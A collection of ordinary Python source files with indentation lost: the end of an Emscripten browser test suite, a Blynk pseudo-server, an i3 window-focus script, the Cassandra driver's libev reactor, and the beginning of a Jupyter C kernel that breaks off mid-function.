self.btest(test_file('wasm_worker/cancel_all_wait_asyncs_at_address.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_init(), emscripten_lock_waitinf_acquire() and emscripten_lock_release()
@also_with_minimal_runtime
def test_wasm_worker_lock_waitinf(self):
self.btest(test_file('wasm_worker/lock_waitinf_acquire.c'), expected='4000', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_wait_acquire() and emscripten_lock_try_acquire() in Worker.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait(self):
self.btest(test_file('wasm_worker/lock_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_wait_acquire() between two Wasm Workers.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait2(self):
self.btest(test_file('wasm_worker/lock_wait_acquire2.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_async_acquire() function.
@also_with_minimal_runtime
def test_wasm_worker_lock_async_acquire(self):
self.btest(test_file('wasm_worker/lock_async_acquire.c'), expected='0', args=['--closure=1', '-sWASM_WORKERS'])
# Tests emscripten_lock_busyspin_wait_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_wait(self):
self.btest(test_file('wasm_worker/lock_busyspin_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_busyspin_waitinf_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_waitinf(self):
self.btest(test_file('wasm_worker/lock_busyspin_waitinf_acquire.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests that proxied JS functions cannot be called from Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_no_proxied_js_functions(self):
self.btest(test_file('wasm_worker/no_proxied_js_functions.c'), expected='0',
args=['--js-library', test_file('wasm_worker/no_proxied_js_functions.js'), '-sWASM_WORKERS', '-sASSERTIONS'])
# Tests emscripten_semaphore_init(), emscripten_semaphore_waitinf_acquire() and emscripten_semaphore_release()
@also_with_minimal_runtime
def test_wasm_worker_semaphore_waitinf_acquire(self):
self.btest(test_file('wasm_worker/semaphore_waitinf_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_semaphore_try_acquire() on the main thread
@also_with_minimal_runtime
def test_wasm_worker_semaphore_try_acquire(self):
self.btest(test_file('wasm_worker/semaphore_try_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp')
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-sMALLOC=emmalloc', '-sABORTING_MALLOC=0', '-sALLOW_MEMORY_GROWTH=1', '-sMAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest_exit(test_file('alloc_3gb.cpp'),
args=['-sMAXIMUM_MEMORY=4GB', '-sALLOW_MEMORY_GROWTH=1'] + args)
test(['-sMALLOC=emmalloc'])
test(['-sMALLOC=emmalloc-debug'])
test(['-sMALLOC=emmalloc-memvalidate'])
test(['-sMALLOC=emmalloc-memvalidate-verbose'])
@parameterized({
# the fetch backend works even on the main thread: we proxy to a background
# thread and busy-wait
'main_thread': (['-sPTHREAD_POOL_SIZE=4'],),
# using proxy_to_pthread also works, of course
'proxy_to_pthread': (['-sPROXY_TO_PTHREAD', '-sINITIAL_MEMORY=32MB', '-DPROXYING'],),
})
@requires_threads
def test_wasmfs_fetch_backend(self, args):
if is_firefox() and '-sPROXY_TO_PTHREAD' not in args:
return self.skipTest('ff hangs on the main_thread version. browser bug?')
create_file('data.dat', 'hello, fetch')
create_file('test.txt', 'fetch 2')
try_delete('subdir')
ensure_dir('subdir')
create_file('subdir/backendfile', 'file 1')
create_file('subdir/backendfile2', 'file 2')
self.btest_exit(test_file('wasmfs/wasmfs_fetch.c'),
args=['-sWASMFS', '-sUSE_PTHREADS', '--js-library', test_file('wasmfs/wasmfs_fetch.js')] + args)
@requires_threads
@no_firefox('no OPFS support yet')
def test_wasmfs_opfs(self):
test = test_file('wasmfs/wasmfs_opfs.c')
args = ['-sWASMFS', '-pthread', '-sPROXY_TO_PTHREAD', '-O3']
self.btest_exit(test, args=args + ['-DWASMFS_SETUP'])
self.btest_exit(test, args=args + ['-DWASMFS_RESUME'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser/emmalloc_memgrowth.cpp'), expected='0', args=['-sMALLOC=emmalloc', '-sALLOW_MEMORY_GROWTH=1', '-sABORTING_MALLOC=0', '-sASSERTIONS=2', '-sMINIMAL_RUNTIME=1', '-sMAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp')
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB', '-sABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp')
# Tests that Emscripten-compiled applications can be run when a slash in the URL query or fragment of the js file
def test_browser_run_with_slash_in_query_and_hash(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O0'])
src = open('test.html').read()
# Slash in query
create_file('test-query.html', src.replace('test.js', 'test.js?type=pass/fail'))
self.run_browser('test-query.html', None, '/report_result?0')
# Slash in fragment
create_file('test-hash.html', src.replace('test.js', 'test.js#pass/fail'))
self.run_browser('test-hash.html', None, '/report_result?0')
# Slash in query and fragment
create_file('test-query-hash.html', src.replace('test.js', 'test.js?type=pass/fail#pass/fail'))
self.run_browser('test-query-hash.html', None, '/report_result?0')
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-sASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest_exit(test_file('pthread/test_pthread_proxy_hammer.cpp'),
args=['-sUSE_PTHREADS', '-O2', '-sPROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser/test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
def test_full_js_library_strict(self):
self.btest_exit(test_file('hello_world.c'), args=['-sINCLUDE_FULL_LIBRARY', '-sSTRICT_JS'])
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941'],
args_base + ['--dump_out_directory', 'other dir/multiple', '--port', '6942']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
dump_dir = 'other dir/multiple' if '--dump_out_directory' in args else 'dump_out'
self.assertExists(self.in_dir(f'{dump_dir}/test.dat'))
self.assertExists(self.in_dir(f'{dump_dir}/heap.dat'))
self.assertExists(self.in_dir(f'{dump_dir}/nested/with space.dat'))
stdout = read_file(self.in_dir('stdout.txt'))
stderr = read_file(self.in_dir('stderr.txt'))
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
pseudo-server-dw-mt.py
|
#!/usr/bin/python
'''
This is a pseudo-server that sends predefined pattern to any connected client.
It is used to test transport behaviour and throughput.
If you want to use it with a sketch, connect your PC and Blynk-enabled device
into the same network and configure Blynk to connect to this pseudo-server:
IPAddress serv(192,168,0,105); // IP address of your PC
Blynk.begin(auth, serv, 8888);
Author: Volodymyr Shymanskyy
License: The MIT license
'''
import select, socket, struct
import os, sys, time, getopt
from threading import Thread
# Configuration options
# Parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:],
"hb:p:",
["help", "bind=", "port=", "sndbuf=", "rcvbuf=", "nodelay", "sleep=", "qty=", "freq=", "pin=", "dump"])
except getopt.GetoptError:
print >>sys.stderr, __doc__
sys.exit(2)
# Default options
HOST = '' # Bind to all interfaces
PORT = 8888 # Bind to port 8888
NODELAY = 0 # No TCP_NODELAY
SNDBUF = 0 # No SNDBUF override
RCVBUF = 0 # No RCVBUF override
MSG_QTY = 10 # Amount of messages
SLEEP = 1.0 # Wait some time between IO
HW_PIN = 14 # Pin #
DUMP = 0
for o, v in opts:
if o in ("-h", "--help"):
print __doc__
sys.exit()
elif o in ("-b", "--bind"):
HOST = v
elif o in ("-p", "--port"):
PORT = int(v)
elif o in ("--sndbuf",):
SNDBUF = int(v)
elif o in ("--rcvbuf",):
RCVBUF = int(v)
elif o in ("--nodelay",):
NODELAY = 1
elif o in ("--sleep",):
SLEEP = float(v)
elif o in ("--freq",):
SLEEP = 1.0/float(v)
elif o in ("--qty",):
MSG_QTY = int(v)
elif o in ("--pin",):
HW_PIN = int(v)
elif o in ("--dump",):
DUMP = 1
# Blynk protocol helpers
hdr = struct.Struct("!BHH")
class MsgType:
RSP = 0
LOGIN = 2
PING = 6
HW = 20
class MsgStatus:
OK = 200
def hw(*args):
# Convert params to string and join using \0
data = "\0".join(map(str, args))
dump("< " + " ".join(map(str, args)))
# Prepend HW command header
return hdr.pack(MsgType.HW, 1, len(data)) + data
# Print utilities
start_time = time.time()
def log(msg):
print "[{:7.3f}] {:}".format(float(time.time() - start_time), msg)
draw_col = 0
def draw(c):
global draw_col
if not DUMP:
sys.stdout.write(c)
draw_col = (draw_col + 1) % 120
if draw_col:
sys.stdout.flush()
else:
sys.stdout.write("\n")
def dump(msg):
if DUMP:
log(msg)
def receive(sock, length):
d = []
l = 0
while l < length:
r = sock.recv(length-l)
if not r:
return ''
d.append(r)
l += len(r)
return ''.join(d)
# Threads
def readthread(conn, addr):
global msgs_in, authenticated
while(msgs_in < MSG_QTY):
data = receive(conn, hdr.size)
if not data:
break
msg_type, msg_id, msg_len = hdr.unpack(data)
#dump("Got {0}, {1}, {2}".format(msg_type, msg_id, msg_len))
if msg_type == MsgType.RSP:
pass
elif msg_type == MsgType.LOGIN:
auth = receive(conn, msg_len)
log("Auth {0}".format(auth))
# Send auth OK and pin modes
conn.sendall(hdr.pack(MsgType.RSP, msg_id, MsgStatus.OK))
conn.sendall(hw("pm", HW_PIN, "out"))
authenticated = True
elif msg_type == MsgType.PING:
log("Ping")
# Send Pong
conn.sendall(hdr.pack(MsgType.RSP, msg_id, MsgStatus.OK))
elif msg_type == MsgType.HW:
data = receive(conn, msg_len)
# Print HW messages (just for fun :)
draw('v')
dump("> " + " ".join(data.split("\0")))
msgs_in += 1
else:
log("Unknown msg type")
break
def writethread(conn, addr):
global msgs_out, authenticated
val = 0
while (msgs_out < MSG_QTY):
if authenticated:
conn.sendall(hw("dw", HW_PIN, val))
val = 0 if val else 1
draw('.')
msgs_out += 1
time.sleep(SLEEP)
# Main code
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Set SO_REUSEADDR, this is needed to ignore WAIT state on next run
serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serv.bind((HOST, PORT))
except socket.error as msg:
log('Bind failed. Error Code: {0}, Msg: {1}'.format(str(msg[0]), msg[1]))
sys.exit()
serv.listen(1)
log('Listening on port %d' % PORT)
# Wait for clients
#while True:
conn, addr = serv.accept()
log('Connection from {0}:{1}'.format(addr[0], str(addr[1])))
if NODELAY != 0:
conn.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if SNDBUF != 0:
sndbuf = conn.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF)
log('Default SNDBUF %s changed to %s' % (sndbuf, SNDBUF))
conn.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, SNDBUF)
if RCVBUF != 0:
rcvbuf = conn.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)
log('Default RCVBUF %s changed to %s' % (rcvbuf, RCVBUF))
conn.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, RCVBUF)
proc_start = time.time()
msgs_in = 0
msgs_out = 0
authenticated = False
wt = Thread(target=readthread, args=(conn, addr))
rt = Thread(target=writethread, args=(conn, addr))
wt.start()
rt.start()
wt.join()
#rt.join()
conn.close()
draw("\n")
log("Time %3.4f" % (time.time() - proc_start))
log("Sent {0} messages".format(msgs_out))
log("Recv {0} messages".format(msgs_in))
|
i3_focus_last.py
|
#!/usr/bin/env python3
import os
import socket
import selectors
import threading
from argparse import ArgumentParser
import i3ipc
SOCKET_FILE = '/tmp/.i3_focus_last'
MAX_WIN_HISTORY = 15
class FocusWatcher:
def __init__(self):
self.i3 = i3ipc.Connection()
self.i3.on('window::focus', self.on_window_focus)
self.listening_socket = socket.socket(socket.AF_UNIX,
socket.SOCK_STREAM)
if os.path.exists(SOCKET_FILE):
os.remove(SOCKET_FILE)
self.listening_socket.bind(SOCKET_FILE)
self.listening_socket.listen(1)
self.window_list = []
self.window_list_lock = threading.RLock()
def on_window_focus(self, i3conn, event):
with self.window_list_lock:
window_id = event.container.props.id
if window_id in self.window_list:
self.window_list.remove(window_id)
self.window_list.insert(0, window_id)
if len(self.window_list) > MAX_WIN_HISTORY:
del self.window_list[MAX_WIN_HISTORY:]
def launch_i3(self):
self.i3.main()
def launch_server(self):
selector = selectors.DefaultSelector()
def accept(sock):
conn, addr = sock.accept()
selector.register(conn, selectors.EVENT_READ, read)
def read(conn):
data = conn.recv(1024)
if data == b'switch':
with self.window_list_lock:
tree = self.i3.get_tree()
windows = set(w.id for w in tree.leaves())
for window_id in self.window_list[1:]:
if window_id not in windows:
self.window_list.remove(window_id)
else:
self.i3.command('[con_id=%s] focus' % window_id)
break
elif not data:
selector.unregister(conn)
conn.close()
selector.register(self.listening_socket, selectors.EVENT_READ, accept)
while True:
for key, event in selector.select():
callback = key.data
callback(key.fileobj)
def run(self):
t_i3 = threading.Thread(target=self.launch_i3)
t_server = threading.Thread(target=self.launch_server)
for t in (t_i3, t_server):
t.start()
if __name__ == '__main__':
parser = ArgumentParser(prog='focus-last.py',
description='''
Focus last focused window.
This script should be launch from the .xsessionrc without argument.
Then you can bind this script with the `--switch` option to one of your
i3 keybinding.
''')
parser.add_argument('--switch', dest='switch', action='store_true',
help='Switch to the previous window', default=False)
args = parser.parse_args()
if not args.switch:
focus_watcher = FocusWatcher()
focus_watcher.run()
else:
client_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client_socket.connect(SOCKET_FILE)
client_socket.send(b'switch')
client_socket.close()
|
libevreactor.py
|
# Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
from collections import deque
from functools import partial
import logging
import os
import socket
import ssl
from threading import Lock, Thread
import time
import weakref
from six.moves import range
from cassandra.connection import (Connection, ConnectionShutdown,
NONBLOCKING, Timer, TimerManager)
try:
import cassandra.io.libevwrapper as libev
except ImportError:
raise ImportError(
"The C extension needed to use libev was not found. This "
"probably means that you didn't have the required build dependencies "
"when installing the driver. See "
"http://datastax.github.io/python-driver/installation.html#c-extensions "
"for instructions on installing build dependencies and building "
"the C extension.")
log = logging.getLogger(__name__)
def _cleanup(loop):
if loop:
loop._cleanup()
class LibevLoop(object):
def __init__(self):
self._pid = os.getpid()
self._loop = libev.Loop()
self._notifier = libev.Async(self._loop)
self._notifier.start()
# prevent _notifier from keeping the loop from returning
self._loop.unref()
self._started = False
self._shutdown = False
self._lock = Lock()
self._lock_thread = Lock()
self._thread = None
# set of all connections; only replaced with a new copy
# while holding _conn_set_lock, never modified in place
self._live_conns = set()
# newly created connections that need their write/read watcher started
self._new_conns = set()
# recently closed connections that need their write/read watcher stopped
self._closed_conns = set()
self._conn_set_lock = Lock()
self._preparer = libev.Prepare(self._loop, self._loop_will_run)
# prevent _preparer from keeping the loop from returning
self._loop.unref()
self._preparer.start()
self._timers = TimerManager()
self._loop_timer = libev.Timer(self._loop, self._on_loop_timer)
def maybe_start(self):
should_start = False
with self._lock:
if not self._started:
log.debug("Starting libev event loop")
self._started = True
should_start = True
if should_start:
with self._lock_thread:
if not self._shutdown:
self._thread = Thread(target=self._run_loop, name="event_loop")
self._thread.daemon = True
self._thread.start()
self._notifier.send()
def _run_loop(self):
while True:
self._loop.start()
# there are still active watchers, no deadlock
with self._lock:
if not self._shutdown and self._live_conns:
log.debug("Restarting event loop")
continue
else:
# all Connections have been closed, no active watchers
log.debug("All Connections currently closed, event loop ended")
self._started = False
break
def _cleanup(self):
self._shutdown = True
if not self._thread:
return
for conn in self._live_conns | self._new_conns | self._closed_conns:
conn.close()
for watcher in (conn._write_watcher, conn._read_watcher):
if watcher:
watcher.stop()
self.notify() # wake the timer watcher
# PYTHON-752 Thread might have just been created and not started
with self._lock_thread:
self._thread.join(timeout=1.0)
if self._thread.is_alive():
log.warning(
"Event loop thread could not be joined, so shutdown may not be clean. "
"Please call Cluster.shutdown() to avoid this.")
log.debug("Event loop thread was joined")
def add_timer(self, timer):
self._timers.add_timer(timer)
self._notifier.send() # wake up in case this timer is earlier
def _update_timer(self):
if not self._shutdown:
next_end = self._timers.service_timeouts()
if next_end:
self._loop_timer.start(next_end - time.time()) # timer handles negative values
else:
self._loop_timer.stop()
def _on_loop_timer(self):
self._timers.service_timeouts()
def notify(self):
self._notifier.send()
def connection_created(self, conn):
with self._conn_set_lock:
new_live_conns = self._live_conns.copy()
new_live_conns.add(conn)
self._live_conns = new_live_conns
new_new_conns = self._new_conns.copy()
new_new_conns.add(conn)
self._new_conns = new_new_conns
def connection_destroyed(self, conn):
with self._conn_set_lock:
new_live_conns = self._live_conns.copy()
new_live_conns.discard(conn)
self._live_conns = new_live_conns
new_closed_conns = self._closed_conns.copy()
new_closed_conns.add(conn)
self._closed_conns = new_closed_conns
self._notifier.send()
def _loop_will_run(self, prepare):
changed = False
for conn in self._live_conns:
if not conn.deque and conn._write_watcher_is_active:
if conn._write_watcher:
conn._write_watcher.stop()
conn._write_watcher_is_active = False
changed = True
elif conn.deque and not conn._write_watcher_is_active:
conn._write_watcher.start()
conn._write_watcher_is_active = True
changed = True
if self._new_conns:
with self._conn_set_lock:
to_start = self._new_conns
self._new_conns = set()
for conn in to_start:
conn._read_watcher.start()
changed = True
if self._closed_conns:
with self._conn_set_lock:
to_stop = self._closed_conns
self._closed_conns = set()
for conn in to_stop:
if conn._write_watcher:
conn._write_watcher.stop()
# clear reference cycles from IO callback
del conn._write_watcher
if conn._read_watcher:
conn._read_watcher.stop()
# clear reference cycles from IO callback
del conn._read_watcher
changed = True
# TODO: update to do connection management, timer updates through dedicated async 'notifier' callbacks
self._update_timer()
if changed:
self._notifier.send()
_global_loop = None
atexit.register(partial(_cleanup, _global_loop))
class LibevConnection(Connection):
"""
An implementation of :class:`.Connection` that uses libev for its event loop.
"""
_write_watcher_is_active = False
_read_watcher = None
_write_watcher = None
_socket = None
@classmethod
def initialize_reactor(cls):
global _global_loop
if not _global_loop:
_global_loop = LibevLoop()
else:
if _global_loop._pid != os.getpid():
log.debug("Detected fork, clearing and reinitializing reactor state")
cls.handle_fork()
_global_loop = LibevLoop()
@classmethod
def handle_fork(cls):
global _global_loop
if _global_loop:
_global_loop._cleanup()
_global_loop = None
@classmethod
def create_timer(cls, timeout, callback):
timer = Timer(timeout, callback)
_global_loop.add_timer(timer)
return timer
def __init__(self, *args, **kwargs):
Connection.__init__(self, *args, **kwargs)
self.deque = deque()
self._deque_lock = Lock()
self._connect_socket()
self._socket.setblocking(0)
with _global_loop._lock:
self._read_watcher = libev.IO(self._socket.fileno(), libev.EV_READ, _global_loop._loop, self.handle_read)
self._write_watcher = libev.IO(self._socket.fileno(), libev.EV_WRITE, _global_loop._loop, self.handle_write)
self._send_options_message()
_global_loop.connection_created(self)
# start the global event loop if needed
_global_loop.maybe_start()
def close(self):
with self.lock:
if self.is_closed:
return
self.is_closed = True
log.debug("Closing connection (%s) to %s", id(self), self.host)
_global_loop.connection_destroyed(self)
self._socket.close()
log.debug("Closed socket to %s", self.host)
# don't leave in-progress operations hanging
if not self.is_defunct:
self.error_all_requests(
ConnectionShutdown("Connection to %s was closed" % self.host))
def handle_write(self, watcher, revents, errno=None):
if revents & libev.EV_ERROR:
if errno:
exc = IOError(errno, os.strerror(errno))
else:
exc = Exception("libev reported an error")
self.defunct(exc)
return
while True:
try:
with self._deque_lock:
next_msg = self.deque.popleft()
except IndexError:
return
try:
sent = self._socket.send(next_msg)
except socket.error as err:
if (err.args[0] in NONBLOCKING):
with self._deque_lock:
self.deque.appendleft(next_msg)
else:
self.defunct(err)
return
else:
if sent < len(next_msg):
with self._deque_lock:
self.deque.appendleft(next_msg[sent:])
def handle_read(self, watcher, revents, errno=None):
if revents & libev.EV_ERROR:
if errno:
exc = IOError(errno, os.strerror(errno))
else:
exc = Exception("libev reported an error")
self.defunct(exc)
return
try:
while True:
buf = self._socket.recv(self.in_buffer_size)
self._iobuf.write(buf)
if len(buf) < self.in_buffer_size:
break
except socket.error as err:
if ssl and isinstance(err, ssl.SSLError):
if err.args[0] not in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE):
self.defunct(err)
return
elif err.args[0] not in NONBLOCKING:
self.defunct(err)
return
if self._iobuf.tell():
self.process_io_buffer()
else:
log.debug("Connection %s closed by server", self)
self.close()
def push(self, data):
sabs = self.out_buffer_size
if len(data) > sabs:
chunks = []
for i in range(0, len(data), sabs):
chunks.append(data[i:i + sabs])
else:
chunks = [data]
with self._deque_lock:
self.deque.extend(chunks)
_global_loop.notify()
|
kernel.py
|
from queue import Queue
from threading import Thread
from ipykernel.kernelbase import Kernel
import re
import subprocess
import tempfile
import os
import os.path as path
class RealTimeSubprocess(subprocess.Popen):
"""
A subprocess that allows to read its stdout and stderr in real time
"""
def __init__(self, cmd, write_to_stdout, write_to_stderr):
"""
:param cmd: the command to execute
:param write_to_stdout: a callable that will be called with chunks of data from stdout
:param write_to_stderr: a callable that will be called with chunks of data from stderr
"""
self._write_to_stdout = write_to_stdout
self._write_to_stderr = write_to_stderr
super().__init__(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)
self._stdout_queue = Queue()
self._stdout_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stdout, self._stdout_queue))
self._stdout_thread.daemon = True
self._stdout_thread.start()
self._stderr_queue = Queue()
self._stderr_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stderr, self._stderr_queue))
self._stderr_thread.daemon = True
self._stderr_thread.start()
@staticmethod
def _enqueue_output(stream, queue):
"""
Add chunks of data from a stream to a queue until the stream is empty.
"""
for line in iter(lambda: stream.read(4096), b''):
queue.put(line)
stream.close()
def write_contents(self):
"""
Write the available content from stdin and stderr where specified when the instance was created
:return:
"""
def read_all_from_queue(queue):
res = b''
size = queue.qsize()
while size != 0:
res += queue.get_nowait()
size -= 1
return res
stdout_contents = read_all_from_queue(self._stdout_queue)
if stdout_contents:
self._write_to_stdout(stdout_contents)
stderr_contents = read_all_from_queue(self._stderr_queue)
if stderr_contents:
self._write_to_stderr(stderr_contents)
class CKernel(Kernel):
implementation = 'jupyter_c_kernel'
implementation_version = '1.0'
language = 'c'
language_version = 'C11'
language_info = {'name': 'c',
'mimetype': 'text/plain',
'file_extension': '.c'}
banner = "C kernel.\n" \
"Uses gcc, compiles in C11, and creates source code files and executables in temporary folder.\n"
def __init__(self, *args, **kwargs):
super(CKernel, self).__init__(*args, **kwargs)
self.files = []
mastertemp = tempfile.mkstemp(suffix='.out')
os.close(mastertemp[0])
self.master_path = mastertemp[1]
filepath = path.join(path.dirname(path.realpath(__file__)), 'resources', 'master.c')
subprocess.call(['gcc', filepath, '-std=c11', '-rdynamic', '-ldl', '-o', self.master_path])
def cleanup_files(self):
"""Remove all the temporary files created by the kernel"""
for file in self.files:
os.remove(file)
os.remove(self.master_path)
def new_temp_file(self, **kwargs):
"""Create a new temp file to be deleted when the kernel shuts down"""
# We don't want the file to be deleted when closed, but only when the kernel stops
kwargs['delete'] = False
kwargs['mode'] = 'w'
file = tempfile.NamedTemporaryFile(**kwargs)
self.files.append(file.name)
return file
def _write_to_stdout(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stdout', 'text': contents})
def _write_to_stderr(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stderr', 'text': contents})
def create_jupyter_subprocess(self, cmd):
return RealTimeSubprocess(cmd,
lambda contents: self._write_to_stdout(contents.decode()),
lambda contents: self._write_to_stderr(contents.decode()))
def compile_with_gcc(self, source_filename, binary_filename, cflags=None, ldflags=None):
cflags = ['-std=c11', '-fPIC', '-shared', '-rdynamic'] + cflags
args = ['gcc', source_filename] + cflags + ['-o', binary_filename] + ldflags
return self.create_jupyter_subprocess(args)
def _filter_magics(self, code):
magics = {'cflags': [],
'ldflags': [],
'args': []}
for line in code.splitlines():
if line.startswith('//%'):
key, value = line[3:].split(":", 2)
key = key.strip().lower()
if key in ['ldflags', 'cflags']:
for flag in value.split():
magics[key] += [flag]
elif key == "args":
# Split arguments respecting quotes
